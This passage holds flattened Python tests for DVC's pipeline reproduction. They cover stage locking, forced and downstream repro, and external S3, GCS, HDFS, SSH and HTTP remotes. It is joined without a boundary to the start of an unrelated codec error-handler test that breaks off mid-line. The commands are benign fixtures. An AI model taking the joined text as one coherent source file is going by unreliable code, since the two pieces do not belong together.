'import shutil; " 'shutil.copytree("{}", "{}")\''.format(idir, odir), ] ) self.assertEqual(ret, 0) ret = main( [ "run", "--no-exec", "--single-stage", "-f", DVC_FILE, *deps, "ls {}".format( " ".join(dep for i, dep in enumerate(deps) if i % 2) ), ] ) self.assertEqual(ret, 0) ret = main(["repro", "--dry", DVC_FILE]) self.assertEqual(ret, 0) class TestReproChangedDeepData(TestReproChangedData): def setUp(self): super().setUp() self.file2 = "file2" self.stage = self._run( fname=self.file2 + ".dvc", outs=[self.file2], deps=[self.file1, self.CODE], cmd=f"python {self.CODE} {self.file1} {self.file2}", name="copy-file-file2", ) def test(self): self.swap_foo_with_bar() stages = self.dvc.reproduce(self._get_stage_target(self.stage)) self.assertTrue(filecmp.cmp(self.file1, self.BAR, shallow=False)) self.assertTrue(filecmp.cmp(self.file2, self.BAR, shallow=False)) self.assertEqual(len(stages), 3) class TestReproForceDownstream(TestDvc): def test(self): stages = self.dvc.add(self.FOO) self.assertEqual(len(stages), 1) foo_stage = stages[0] self.assertTrue(foo_stage is not None) code1 = "code1.py" shutil.copyfile(self.CODE, code1) file1 = "file1" file1_stage = self.dvc.run( outs=[file1], deps=[self.FOO, code1], cmd=f"python {code1} {self.FOO} {file1}", single_stage=True, ) self.assertTrue(file1_stage is not None) code2 = "code2.py" shutil.copyfile(self.CODE, code2) file2 = "file2" file2_stage = self.dvc.run( outs=[file2], deps=[file1, code2], cmd=f"python {code2} {file1} {file2}", single_stage=True, ) self.assertTrue(file2_stage is not None) code3 = "code3.py" shutil.copyfile(self.CODE, code3) file3 = "file3" file3_stage = self.dvc.run( outs=[file3], deps=[file2, code3], cmd=f"python {code3} {file2} {file3}", single_stage=True, ) self.assertTrue(file3_stage is not None) with open(code2, "a") as fobj: fobj.write("\n\n") stages = self.dvc.reproduce(file3_stage.path, force_downstream=True) self.assertEqual(len(stages), 2) self.assertEqual(stages[0].path, file2_stage.path) self.assertEqual(stages[1].path, file3_stage.path) class TestReproPipeline(TestReproChangedDeepData): def test(self): stages = self.dvc.reproduce( self._get_stage_target(self.stage), force=True, pipeline=True ) self.assertEqual(len(stages), 3) def test_cli(self): ret = main( ["repro", "--pipeline", "-f", self._get_stage_target(self.stage)] ) self.assertEqual(ret, 0) class TestReproPipelines(SingleStageRun, TestDvc): def setUp(self): super().setUp() stages = self.dvc.add(self.FOO) self.assertEqual(len(stages), 1) self.foo_stage = stages[0] self.assertTrue(self.foo_stage is not None) stages = self.dvc.add(self.BAR) self.assertEqual(len(stages), 1) self.bar_stage = stages[0] self.assertTrue(self.bar_stage is not None) self.file1 = "file1" self.file1_stage = self.dvc.run( fname=self.file1 + ".dvc", outs=[self.file1], deps=[self.FOO, self.CODE], cmd=f"python {self.CODE} {self.FOO} {self.file1}", single_stage=True, ) self.file2 = "file2" self.file2_stage = self._run( fname=self.file2 + ".dvc", outs=[self.file2], deps=[self.BAR, self.CODE], cmd=f"python {self.CODE} {self.BAR} {self.file2}", name="copy-BAR-file2", ) def test(self): stages = self.dvc.reproduce(all_pipelines=True, force=True) self.assertEqual(len(stages), 4) self.assertTrue(self.file1_stage in stages) self.assertTrue(self.file2_stage in stages) def test_cli(self): ret = main(["repro", "-f", "-P"]) self.assertEqual(ret, 0) class TestReproLocked(TestReproChangedData): def test(self): file2 = "file2" file2_stage = self._run( fname=file2 + ".dvc", outs=[file2], deps=[self.file1, self.CODE], cmd=f"python {self.CODE} {self.file1} {file2}", name="copy-file1-file2", ) self.swap_foo_with_bar() ret = main(["lock", self._get_stage_target(file2_stage)]) self.assertEqual(ret, 0) stages = self.dvc.reproduce(self._get_stage_target(file2_stage)) self.assertEqual(len(stages), 0) ret = main(["unlock", self._get_stage_target(file2_stage)]) self.assertEqual(ret, 0) stages = self.dvc.reproduce(self._get_stage_target(file2_stage)) self.assertTrue(filecmp.cmp(self.file1, self.BAR, shallow=False)) self.assertTrue(filecmp.cmp(file2, self.BAR, shallow=False)) self.assertEqual(len(stages), 3) def test_non_existing(self): with self.assertRaises(StageFileDoesNotExistError): self.dvc.lock_stage("Dvcfile") self.dvc.lock_stage("pipelines.yaml") self.dvc.lock_stage("pipelines.yaml:name") self.dvc.lock_stage("Dvcfile:name") self.dvc.lock_stage("stage.dvc") self.dvc.lock_stage("stage.dvc:name") self.dvc.lock_stage("not-existing-stage.json") ret = main(["lock", "non-existing-stage"]) self.assertNotEqual(ret, 0) class TestReproLockedCallback(SingleStageRun, TestDvc): def test(self): file1 = "file1" file1_stage = file1 + ".dvc" # NOTE: purposefully not specifying dependencies # to create a callback stage. stage = self._run( fname=file1_stage, outs=[file1], cmd=f"python {self.CODE} {self.FOO} {file1}", name="copy-FOO-file1", ) self.assertTrue(stage is not None) stages = self.dvc.reproduce(self._get_stage_target(stage)) self.assertEqual(len(stages), 1) self.dvc.lock_stage(self._get_stage_target(stage)) stages = self.dvc.reproduce(self._get_stage_target(stage)) self.assertEqual(len(stages), 0) self.dvc.lock_stage(self._get_stage_target(stage), unlock=True) stages = self.dvc.reproduce(self._get_stage_target(stage)) self.assertEqual(len(stages), 1) class TestReproLockedUnchanged(TestRepro): def test(self): """ Check that locking/unlocking doesn't affect stage state """ target = self._get_stage_target(self.stage) self.dvc.lock_stage(target) stages = self.dvc.reproduce(target) self.assertEqual(len(stages), 0) self.dvc.lock_stage(target, unlock=True) stages = self.dvc.reproduce(target) self.assertEqual(len(stages), 0) class TestReproMetricsAddUnchanged(TestDvc): def test(self): """ Check that adding/removing metrics doesn't affect stage state """ stages = self.dvc.add(self.FOO) self.assertEqual(len(stages), 1) self.assertTrue(stages[0] is not None) file1 = "file1" file1_stage = file1 + ".dvc" self.dvc.run( fname=file1_stage, outs_no_cache=[file1], deps=[self.FOO, self.CODE], cmd=f"python {self.CODE} {self.FOO} {file1}", single_stage=True, ) stages = self.dvc.reproduce(file1_stage) self.assertEqual(len(stages), 0) self.dvc.metrics.add(file1) stages = self.dvc.reproduce(file1_stage) self.assertEqual(len(stages), 0) self.dvc.metrics.remove(file1) stages = self.dvc.reproduce(file1_stage) self.assertEqual(len(stages), 0) class TestReproPhony(TestReproChangedData): def test(self): stage = self._run( cmd="cat " + self.file1, deps=[self.file1], name="no_cmd" ) self.swap_foo_with_bar() self.dvc.reproduce(self._get_stage_target(stage)) self.assertTrue(filecmp.cmp(self.file1, self.BAR, shallow=False)) class TestNonExistingOutput(TestRepro): def test(self): os.unlink(self.FOO) with self.assertRaises(ReproductionError): self.dvc.reproduce(self._get_stage_target(self.stage)) class TestReproDataSource(TestReproChangedData): def test(self): self.swap_foo_with_bar() stages = self.dvc.reproduce(self.foo_stage.path) self.assertTrue(filecmp.cmp(self.FOO, self.BAR, shallow=False)) self.assertEqual(stages[0].outs[0].checksum, file_md5(self.BAR)[0]) class TestReproChangedDir(SingleStageRun, TestDvc): def test(self): file_name = "file" shutil.copyfile(self.FOO, file_name) dir_name = "dir" dir_code = "dir.py" code = ( 'import os; import shutil; os.mkdir("{}"); ' 'shutil.copyfile("{}", os.path.join("{}", "{}"))' ) with open(dir_code, "w+") as fd: fd.write(code.format(dir_name, file_name, dir_name, file_name)) stage = self._run( outs=[dir_name], deps=[file_name, dir_code], cmd=f"python {dir_code}", name="copy-in-dir", ) target = self._get_stage_target(stage) stages = self.dvc.reproduce(target) self.assertEqual(len(stages), 0) os.unlink(file_name) shutil.copyfile(self.BAR, file_name) stages = self.dvc.reproduce(target) self.assertEqual(len(stages), 1) class TestReproChangedDirData(SingleStageRun, TestDvc): def test(self): dir_name = "dir" dir_code = "dir_code.py" with open(dir_code, "w+") as fd: fd.write( "import os; import sys; import shutil; " "shutil.copytree(sys.argv[1], sys.argv[2])" ) stage = self._run( outs=[dir_name], deps=[self.DATA_DIR, dir_code], cmd=f"python {dir_code} {self.DATA_DIR} {dir_name}", name="copy-dir", ) target = self._get_stage_target(stage) self.assertTrue(stage is not None) stages = self.dvc.reproduce(target) self.assertEqual(len(stages), 0) with open(self.DATA_SUB, "a") as fd: fd.write("add") stages = self.dvc.reproduce(target) self.assertEqual(len(stages), 1) self.assertTrue(stages[0] is not None) # Check that dvc indeed registers changed output dir shutil.move(self.BAR, dir_name) stages = self.dvc.reproduce(target) self.assertEqual(len(stages), 1) self.assertTrue(stages[0] is not None) # Check that dvc registers mtime change for the directory. System.hardlink(self.DATA_SUB, self.DATA_SUB + ".lnk") stages = self.dvc.reproduce(target) self.assertEqual(len(stages), 1) self.assertTrue(stages[0] is not None) class TestReproMissingMd5InStageFile(TestRepro): def test(self): d = load_stage_file(self.file1_stage) del d[Stage.PARAM_OUTS][0][LocalRemote.PARAM_CHECKSUM] del d[Stage.PARAM_DEPS][0][LocalRemote.PARAM_CHECKSUM] dump_stage_file(self.file1_stage, d) stages = self.dvc.reproduce(self.file1_stage) self.assertEqual(len(stages), 1) class TestCmdRepro(TestReproChangedData): def test(self): self.swap_foo_with_bar() ret = main(["status"]) self.assertEqual(ret, 0) ret = main(["repro", self._get_stage_target(self.stage)]) self.assertEqual(ret, 0) ret = main(["repro", "non-existing-file"]) self.assertNotEqual(ret, 0) class TestCmdReproChdir(TestDvc): def test(self): dname = "dir" os.mkdir(dname) foo = os.path.join(dname, self.FOO) bar = os.path.join(dname, self.BAR) code = os.path.join(dname, self.CODE) shutil.copyfile(self.FOO, foo) shutil.copyfile(self.CODE, code) ret = main( [ "run", "--single-stage", "-f", f"{dname}/Dvcfile", "-w", f"{dname}", "-d", self.FOO, "-o", self.BAR, f"python {self.CODE} {self.FOO} {self.BAR}", ] ) self.assertEqual(ret, 0) self.assertTrue(os.path.isfile(foo)) self.assertTrue(os.path.isfile(bar)) self.assertTrue(filecmp.cmp(foo, bar, shallow=False)) os.unlink(bar) ret = main(["repro", "-c", dname, DVC_FILE]) self.assertEqual(ret, 0) self.assertTrue(os.path.isfile(foo)) self.assertTrue(os.path.isfile(bar)) self.assertTrue(filecmp.cmp(foo, bar, shallow=False)) class TestReproExternalBase(SingleStageRun, TestDvc): cache_type = None @staticmethod def should_test(): return False @property def cache_scheme(self): return self.scheme @property def scheme(self): return None @property def scheme_sep(self): return "://" @property def sep(self): return "/" def check_already_cached(self, stage): stage.outs[0].remove() patch_download = patch.object( stage.deps[0], "download", wraps=stage.deps[0].download ) patch_checkout = patch.object( stage.outs[0], "checkout", wraps=stage.outs[0].checkout ) from dvc.stage.run import cmd_run patch_run = patch("dvc.stage.run.cmd_run", wraps=cmd_run) with self.dvc.lock, self.dvc.state: with patch_download as mock_download: with patch_checkout as mock_checkout: with patch_run as mock_run: stage.locked = False stage.run() stage.locked = True mock_run.assert_not_called() mock_download.assert_not_called() mock_checkout.assert_called_once() @patch("dvc.prompt.confirm", return_value=True) def test(self, mock_prompt): if not self.should_test(): raise SkipTest(f"Test {self.__class__.__name__} is disabled") cache = ( self.scheme + self.scheme_sep + self.bucket + self.sep + str(uuid.uuid4()) ) ret = main(["config", "cache." + self.cache_scheme, "myrepo"]) self.assertEqual(ret, 0) ret = main(["remote", "add", "myrepo", cache]) self.assertEqual(ret, 0) if self.cache_type: ret = main(["remote", "modify", "myrepo", "type", self.cache_type]) self.assertEqual(ret, 0) remote_name = "myremote" remote_key = str( remote = ( self.scheme + self.scheme_sep + self.bucket + self.sep + remote_key ) ret = main(["remote", "add", remote_name, remote]) self.assertEqual(ret, 0) if self.cache_type: ret = main( ["remote", "modify", remote_name, "type", self.cache_type] ) self.assertEqual(ret, 0) self.dvc = DvcRepo(".") foo_key = remote_key + self.sep + self.FOO bar_key = remote_key + self.sep + self.BAR foo_path = ( self.scheme + self.scheme_sep + self.bucket + self.sep + foo_key ) bar_path = ( self.scheme + self.scheme_sep + self.bucket + self.sep + bar_key ) # Using both plain and remote notation out_foo_path = "remote://" + remote_name + "/" + self.FOO out_bar_path = bar_path self.write(self.bucket, foo_key, self.FOO_CONTENTS) import_stage = self.dvc.imp_url(out_foo_path, "import") self.assertTrue(os.path.exists("import")) self.assertTrue(filecmp.cmp("import", self.FOO, shallow=False)) self.assertEqual(self.dvc.status([import_stage.path]), {}) self.check_already_cached(import_stage) import_remote_stage = self.dvc.imp_url( out_foo_path, out_foo_path + "_imported" ) self.assertEqual(self.dvc.status([import_remote_stage.path]), {}) cmd_stage = self._run( outs=[out_bar_path], deps=[out_foo_path], cmd=self.cmd(foo_path, bar_path), name="external-base", ) self.assertEqual(self.dvc.status([cmd_stage.addressing]), {}) self.assertEqual(self.dvc.status(), {}) self.check_already_cached(cmd_stage) self.write(self.bucket, foo_key, self.BAR_CONTENTS) self.assertNotEqual(self.dvc.status(), {}) self.dvc.update([import_stage.path]) self.assertTrue(os.path.exists("import")) self.assertTrue(filecmp.cmp("import", self.BAR, shallow=False)) self.assertEqual(self.dvc.status([import_stage.path]), {}) self.dvc.update([import_remote_stage.path]) self.assertEqual(self.dvc.status([import_remote_stage.path]), {}) stages = self.dvc.reproduce(cmd_stage.addressing) self.assertEqual(len(stages), 1) self.assertEqual(self.dvc.status([cmd_stage.addressing]), {}) self.assertEqual(self.dvc.status(), {}) self.dvc.gc(workspace=True) self.assertEqual(self.dvc.status(), {}) self.dvc.remove(cmd_stage.path, dvc_only=True) self.assertNotEqual(self.dvc.status([cmd_stage.addressing]), {}) self.dvc.checkout([cmd_stage.path], force=True) self.assertEqual(self.dvc.status([cmd_stage.addressing]), {}) @pytest.mark.skipif(os.name == "nt", reason="temporarily disabled on windows") class TestReproExternalS3(S3, TestReproExternalBase): @property def scheme(self): return "s3" @property def bucket(self): return TEST_AWS_REPO_BUCKET def cmd(self, i, o): return f"aws s3 cp {i} {o}" def write(self, bucket, key, body): s3 = boto3.client("s3") s3.put_object(Bucket=bucket, Key=key, Body=body) class TestReproExternalGS(GCP, TestReproExternalBase): @property def scheme(self): return "gs" @property def bucket(self): return TEST_GCP_REPO_BUCKET def cmd(self, i, o): return f"gsutil cp {i} {o}" def write(self, bucket, key, body): client = gc.Client() bucket = client.bucket(bucket) bucket.blob(key).upload_from_string(body) class TestReproExternalHDFS(HDFS, TestReproExternalBase): @property def scheme(self): return "hdfs" @property def bucket(self): return f"{getpass.getuser()}@127.0.0.1" def cmd(self, i, o): return f"hadoop fs -cp {i} {o}" def write(self, bucket, key, body): url = self.scheme + "://" + bucket + "/" + key p = Popen( f"hadoop fs -rm -f {url}", shell=True, executable=os.getenv("SHELL"), stdin=PIPE, stdout=PIPE, stderr=PIPE, ) p.communicate() p = Popen( "hadoop fs -mkdir -p {}".format(posixpath.dirname(url)), shell=True, executable=os.getenv("SHELL"), stdin=PIPE, stdout=PIPE, stderr=PIPE, ) out, err = p.communicate() if p.returncode != 0: print(out) print(err) self.assertEqual(p.returncode, 0) with open("tmp", "w+") as fd: fd.write(body) p = Popen( "hadoop fs -copyFromLocal {} {}".format("tmp", url), shell=True, executable=os.getenv("SHELL"), stdin=PIPE, stdout=PIPE, stderr=PIPE, ) out, err = p.communicate() if p.returncode != 0: print(out) print(err) self.assertEqual(p.returncode, 0) @flaky(max_runs=5, min_passes=1) class TestReproExternalSSH(SSH, TestReproExternalBase): _dir = None cache_type = "copy" @property def scheme(self): return "ssh" @property def bucket(self): if not self._dir: self._dir = self.mkdtemp() return f"{getpass.getuser()}@127.0.0.1:{self._dir}" def cmd(self, i, o): prefix = "ssh://" assert i.startswith(prefix) and o.startswith(prefix) i = i[len(prefix) :] o = o[len(prefix) :] return f"scp {i} {o}" def write(self, bucket, key, body): path = posixpath.join(self._dir, key) ssh = None sftp = None try: ssh = paramiko.SSHClient() ssh.load_system_host_keys() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect("127.0.0.1") sftp = ssh.open_sftp() try: sftp.stat(path) sftp.remove(path) except OSError: pass stdin, stdout, stderr = ssh.exec_command( f"mkdir -p $(dirname {path})" ) self.assertEqual(stdout.channel.recv_exit_status(), 0) with sftp.open(path, "w+") as fobj: fobj.write(body) finally: if sftp: sftp.close() if ssh: ssh.close() class TestReproExternalLOCAL(Local, TestReproExternalBase): cache_type = "hardlink" def setUp(self): super().setUp() self.tmpdir = self.mkdtemp() ret = main(["config", "cache.type", "hardlink"]) self.assertEqual(ret, 0) self.dvc = DvcRepo(".") @property def cache_scheme(self): return "local" @property def scheme(self): return "" @property def scheme_sep(self): return "" @property def sep(self): return os.sep @property def bucket(self): return self.tmpdir def cmd(self, i, o): if os.name == "nt": return f"copy {i} {o}" return f"cp {i} {o}" def write(self, bucket, key, body): path = os.path.join(bucket, key) dname = os.path.dirname(path) if not os.path.exists(dname): os.makedirs(dname) with open(path, "w+") as fd: fd.write(body) class TestReproExternalHTTP(TestReproExternalBase): _external_cache_id = None @staticmethod def get_remote(port): return f"http://localhost:{port}/" @property def local_cache(self): return os.path.join(self.dvc.dvc_dir, "cache") def test(self): # Import with StaticFileServer() as httpd: import_url = urljoin(self.get_remote(httpd.server_port), self.FOO) import_output = "imported_file" import_stage = self.dvc.imp_url(import_url, import_output) self.assertTrue(os.path.exists(import_output)) self.assertTrue(filecmp.cmp(import_output, self.FOO, shallow=False)) self.dvc.remove("imported_file.dvc") with StaticFileServer(handler_class=ContentMD5Handler) as httpd: import_url = urljoin(self.get_remote(httpd.server_port), self.FOO) import_output = "imported_file" import_stage = self.dvc.imp_url(import_url, import_output) self.assertTrue(os.path.exists(import_output)) self.assertTrue(filecmp.cmp(import_output, self.FOO, shallow=False)) # Run --deps with StaticFileServer() as httpd: remote = self.get_remote(httpd.server_port) cache_id = str(uuid.uuid4()) cache = urljoin(remote, cache_id) ret1 = main(["remote", "add", "mycache", cache]) ret2 = main(["remote", "add", "myremote", remote]) self.assertEqual(ret1, 0) self.assertEqual(ret2, 0) self.dvc = DvcRepo(".") run_dependency = urljoin(remote, self.BAR) run_output = "remote_file" cmd = f'open("{run_output}", "w+")' with open("create-output.py", "w") as fd: fd.write(cmd) run_stage = self._run( deps=[run_dependency], outs=[run_output], cmd="python create-output.py", name="http_run", ) self.assertTrue(run_stage is not None) self.assertTrue(os.path.exists(run_output)) # Pull self.dvc.remove(import_stage.path, dvc_only=True) self.assertFalse(os.path.exists(import_output)) shutil.move(self.local_cache, cache_id) self.assertFalse(os.path.exists(self.local_cache)) self.dvc.pull([import_stage.path], remote="mycache") self.assertTrue(os.path.exists(import_output)) class TestReproShell(TestDvc): def test(self): if os.name == "nt": return fname = "shell.txt" stage = fname + ".dvc" self.dvc.run( fname=stage, outs=[fname], cmd=f"echo $SHELL > {fname}", single_stage=True, ) with open(fname) as fd: self.assertEqual(os.getenv("SHELL"), fd.read().strip()) os.unlink(fname) self.dvc.reproduce(stage) with open(fname) as fd: self.assertEqual(os.getenv("SHELL"), fd.read().strip()) class TestReproAllPipelines(SingleStageRun, TestDvc): def test(self): stages = [ self._run( fname="start.dvc", outs=["start.txt"], cmd="echo start > start.txt", name="start", ), self._run( fname="middle.dvc", deps=["start.txt"], outs=["middle.txt"], cmd="echo middle > middle.txt", name="middle", ), self._run( fname="final.dvc", deps=["middle.txt"], outs=["final.txt"], cmd="echo final > final.txt", name="final", ), self._run( fname="disconnected.dvc", outs=["disconnected.txt"], cmd="echo other > disconnected.txt", name="disconnected", ), ] from dvc.state import StateNoop self.dvc.state = StateNoop() with patch.object( Stage, "reproduce", side_effect=stages ) as mock_reproduce: ret = main(["repro", "--all-pipelines"]) self.assertEqual(ret, 0) self.assertEqual(mock_reproduce.call_count, 4) class TestReproNoCommit(TestRepro): def test(self): remove(self.dvc.cache.local.cache_dir) ret = main( ["repro", self._get_stage_target(self.stage), "--no-commit"] ) self.assertEqual(ret, 0) self.assertEqual(os.listdir(self.dvc.cache.local.cache_dir), ["runs"]) class TestReproAlreadyCached(TestRepro): def test(self): stage = self._run( fname="datetime.dvc", deps=[], outs=["datetime.txt"], cmd='python -c "import time; print(time.time())" > datetime.txt', name="datetime", ) run_out = stage.outs[0] repro_out = self.dvc.reproduce(self._get_stage_target(stage))[0].outs[ 0 ] self.assertNotEqual(run_out.checksum, repro_out.checksum) def test_force_with_dependencies(self): run_out = self.dvc.run( fname="datetime.dvc", deps=[self.FOO], outs=["datetime.txt"], cmd='python -c "import time; print(time.time())" > datetime.txt', single_stage=True, ).outs[0] ret = main(["repro", "--force", "datetime.dvc"]) self.assertEqual(ret, 0) repro_out = Dvcfile(self.dvc, "datetime.dvc").stage.outs[0] self.assertNotEqual(run_out.checksum, repro_out.checksum) def test_force_import(self): ret = main(["import-url", self.FOO, self.BAR]) self.assertEqual(ret, 0) patch_download = patch.object( LocalRemote, "download", side_effect=LocalRemote.download, autospec=True, ) patch_checkout = patch.object( BaseOutput, "checkout", side_effect=BaseOutput.checkout, autospec=True, ) with patch_download as mock_download: with patch_checkout as mock_checkout: assert main(["unlock", "bar.dvc"]) == 0 ret = main(["repro", "--force", "bar.dvc"]) self.assertEqual(ret, 0) self.assertEqual(mock_download.call_count, 1) self.assertEqual(mock_checkout.call_count, 0) class TestShouldDisplayMetricsOnReproWithMetricsOption(TestDvc): def test(self): metrics_file = "metrics_file" metrics_value = 0.123489015 ret = main( [ "run", "--single-stage", "-m", metrics_file, f"echo {metrics_value} >> {metrics_file}", ] ) self.assertEqual(0, ret) self._caplog.clear() from dvc.dvcfile import DVC_FILE_SUFFIX ret = main( ["repro", "--force", "--metrics", metrics_file + DVC_FILE_SUFFIX] ) self.assertEqual(0, ret) expected_metrics_display = f"{metrics_file}: {metrics_value}" self.assertIn(expected_metrics_display, self._caplog.text) @pytest.fixture def repro_dir(tmp_dir, dvc, run_copy): # Creates repo with following structure: # data_dir/dir_file origin_data # | | | # | | origin_copy.dvc # unrelated2.dvc | | | # | | unrelated1.dvc # dir/subdir/dir_file_copy.dvc | # | | # | dir/origin_copy_2.dvc # | | # \ / # \ / # dir/Dvcfile tmp_dir.gen( { "origin_data": "origin data content", "data_dir": {"dir_file": "dir file content"}, "dir": {"subdir": {}}, } ) stages = {} origin_copy = tmp_dir / "origin_copy" stage = run_copy("origin_data", os.fspath(origin_copy), single_stage=True) assert stage is not None assert origin_copy.read_text() == "origin data content" stages["origin_copy"] = stage origin_copy_2 = tmp_dir / "dir" / "origin_copy_2" stage = run_copy( os.fspath(origin_copy), os.fspath(origin_copy_2), fname=os.fspath(origin_copy_2) + ".dvc", single_stage=True, ) assert stage is not None assert origin_copy_2.read_text() == "origin data content" stages["origin_copy_2"] = stage dir_file_path = tmp_dir / "data_dir" / "dir_file" dir_file_copy = tmp_dir / "dir" / "subdir" / "dir_file_copy" stage = run_copy( os.fspath(dir_file_path), os.fspath(dir_file_copy), fname=os.fspath(dir_file_copy) + ".dvc", single_stage=True, ) assert stage is not None assert dir_file_copy.read_text() == "dir file content" stages["dir_file_copy"] = stage last_stage = tmp_dir / "dir" / DVC_FILE deps = [os.fspath(origin_copy_2), os.fspath(dir_file_copy)] stage = dvc.run( cmd="echo {}".format(" ".join(deps)), fname=os.fspath(last_stage), deps=deps, single_stage=True, ) assert stage is not None stages["last_stage"] = stage # Unrelated are to verify that reproducing `dir` will not trigger them too assert ( run_copy(os.fspath(origin_copy), "unrelated1", single_stage=True) is not None ) assert ( run_copy(os.fspath(dir_file_path), "unrelated2", single_stage=True) is not None ) yield stages def _rewrite_file(path_elements, new_content): if isinstance(path_elements, str): path_elements = [path_elements] file = Path(os.sep.join(path_elements)) file.unlink() file.write_text(new_content) def _read_out(stage): return Path(stage.outs[0].fspath).read_text() def test_recursive_repro_default(dvc, repro_dir): """ Test recursive repro on dir after a dep outside this dir has changed. """ _rewrite_file("origin_data", "new origin data content") stages = dvc.reproduce("dir", recursive=True) # Check that the dependency ("origin_copy") and the dependent stages # inside the folder have been reproduced ("origin_copy_2", "last_stage") assert stages == [ repro_dir["origin_copy"], repro_dir["origin_copy_2"], repro_dir["last_stage"], ] assert _read_out(repro_dir["origin_copy"]) == "new origin data content" assert _read_out(repro_dir["origin_copy_2"]) == "new origin data content" def test_recursive_repro_single(dvc, repro_dir): """ Test recursive single-item repro on dir after a dep outside this dir has changed. """ _rewrite_file("origin_data", "new origin content") _rewrite_file(["data_dir", "dir_file"], "new dir file content") stages = dvc.reproduce("dir", recursive=True, single_item=True) # Check that just stages inside given dir # with changed direct deps have been reproduced. # This means that "origin_copy_2" stage should not be reproduced # since it depends on "origin_copy". # Also check that "dir_file_copy" stage was reproduced before "last_stage" assert stages == [repro_dir["dir_file_copy"], repro_dir["last_stage"]] assert _read_out(repro_dir["dir_file_copy"]) == "new dir file content" def test_recursive_repro_single_force(dvc, repro_dir): """ Test recursive single-item force repro on dir without any dependencies changing. """ stages = dvc.reproduce("dir", recursive=True, single_item=True, force=True) # Check that all stages inside given dir have been reproduced # Also check that "dir_file_copy" stage was reproduced before "last_stage" # and that "origin_copy" stage was reproduced before "last_stage" stage assert len(stages) == 3 assert set(stages) == { repro_dir["origin_copy_2"], repro_dir["dir_file_copy"], repro_dir["last_stage"], } assert stages.index(repro_dir["origin_copy_2"]) < stages.index( repro_dir["last_stage"] ) assert stages.index(repro_dir["dir_file_copy"]) < stages.index( repro_dir["last_stage"] ) def test_recursive_repro_empty_dir(tmp_dir, dvc): """ Test recursive repro on an empty directory """ (tmp_dir / "emptydir").mkdir() stages = dvc.reproduce("emptydir", recursive=True, force=True) assert stages == [] def test_recursive_repro_recursive_missing_file(dvc): """ Test recursive repro on a missing file """ with pytest.raises(StageFileDoesNotExistError): dvc.reproduce("notExistingStage.dvc", recursive=True) with pytest.raises(StageFileDoesNotExistError): dvc.reproduce("notExistingDir/", recursive=True) def test_recursive_repro_on_stage_file(dvc, repro_dir): """ Test recursive repro on a stage file instead of directory """ stages = dvc.reproduce( repro_dir["origin_copy_2"].relpath, recursive=True, force=True ) assert stages == [repro_dir["origin_copy"], repro_dir["origin_copy_2"]] def test_dvc_formatting_retained(tmp_dir, dvc, run_copy): tmp_dir.dvc_gen("foo", "foo content") stage = run_copy( "foo", "foo_copy", fname="foo_copy.dvc", single_stage=True ) stage_path = tmp_dir / stage.relpath # Add comments and custom formatting to DVC-file lines = list(map(_format_dvc_line, stage_path.read_text().splitlines())) lines.insert(0, "# Starting comment") stage_text = "".join(line + "\n" for line in lines) stage_path.write_text(stage_text) # Rewrite data source and repro (tmp_dir / "foo").write_text("new foo") dvc.reproduce("foo_copy.dvc", force=True) assert _hide_md5(stage_text) == _hide_md5(stage_path.read_text()) def _format_dvc_line(line): # Add line comment for all cache and md5 keys if "cache:" in line or "md5:" in line: return line + " # line comment" # Format command as one word per line elif line.startswith("cmd: "): pre, command = line.split(None, 1) return pre + " >\n" + "\n".join(" " + s for s in command.split()) else: return line def _hide_md5(text): return re.sub(r"\b[a-f0-9]{32}\b", "", text) def test_downstream(dvc): # The dependency graph should look like this: # # E # / \ # D F # / \ \ # B C G # \ / # A # assert main(["run", "--single-stage", "-o", "A", "echo A>A"]) == 0 assert ( main(["run", "--single-stage", "-d", "A", "-o", "B", "echo B>B"]) == 0 ) assert ( main(["run", "--single-stage", "-d", "A", "-o", "C", "echo C>C"]) == 0 ) assert ( main( [ "run", "--single-stage", "-d", "B", "-d", "C", "-o", "D", "echo D>D", ] ) == 0 ) assert main(["run", "--single-stage", "-o", "G", "echo G>G"]) == 0 assert ( main(["run", "--single-stage", "-d", "G", "-o", "F", "echo F>F"]) == 0 ) assert ( main( [ "run", "--single-stage", "-d", "D", "-d", "F", "-o", "E", "echo E>E", ] ) == 0 ) # We want the evaluation to move from B to E # # E # / # D # / # B # evaluation = dvc.reproduce("B.dvc", downstream=True, force=True) assert len(evaluation) == 3 assert evaluation[0].relpath == "B.dvc" assert evaluation[1].relpath == "D.dvc" assert evaluation[2].relpath == "E.dvc" # B, C should be run (in any order) before D # See https://github.com/iterative/dvc/issues/3602 evaluation = dvc.reproduce("A.dvc", downstream=True, force=True) assert len(evaluation) == 5 assert evaluation[0].relpath == "A.dvc" assert {evaluation[1].relpath, evaluation[2].relpath} == {"B.dvc", "C.dvc"} assert evaluation[3].relpath == "D.dvc" assert evaluation[4].relpath == "E.dvc" @pytest.mark.skipif( os.name == "nt", reason="external output scenario is not supported on Windows", ) def test_ssh_dir_out(tmp_dir, dvc, ssh_server): tmp_dir.gen({"foo": "foo content"}) # Set up remote and cache user = ssh_server.test_creds["username"] port = ssh_server.port keyfile = ssh_server.test_creds["key_filename"] remote_url = SSHMocked.get_url(user, port) assert main(["remote", "add", "upstream", remote_url]) == 0 assert main(["remote", "modify", "upstream", "keyfile", keyfile]) == 0 cache_url = SSHMocked.get_url(user, port) assert main(["remote", "add", "sshcache", cache_url]) == 0 assert main(["config", "cache.ssh", "sshcache"]) == 0 assert main(["remote", "modify", "sshcache", "keyfile", keyfile]) == 0 # Recreating to reread configs repo = DvcRepo(dvc.root_dir) # To avoid "WARNING: UNPROTECTED PRIVATE KEY FILE" from ssh os.chmod(keyfile, 0o600) (tmp_dir / "script.py").write_text( "import sys, pathlib\n" "path = pathlib.Path(sys.argv[1])\n" "dir_out = path / 'dir-out'\n" "dir_out.mkdir()\n" "(dir_out / '1.txt').write_text('1')\n" "(dir_out / '2.txt').write_text('2')\n" ) url_info = URLInfo(remote_url) repo.run( cmd="python {} {}".format(tmp_dir / "script.py", url_info.path), single_stage=True, outs=["remote://upstream/dir-out"], deps=["foo"], # add a fake dep to not consider this a callback ) repo.reproduce("dir-out.dvc") repo.reproduce("dir-out.dvc", force=True) from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals from pytest import raises GARBAGE = b"a\xef\xf9" # I had thought to wrap codec error handler registration in a context manager # so we could clean up the global registry state post-test, but: # > There is no API to unregister a codec search function, since deregistration # > would break the codec cache used by the registry to speedup codec # > lookup. # # > Why would you want to unregister a codec search function ? # # https://mail.python.org/pipermail/python-dev/2011-September/113590.html # O.o def test_garbage_is_garbage(): raises(UnicodeDecodeError, lambda 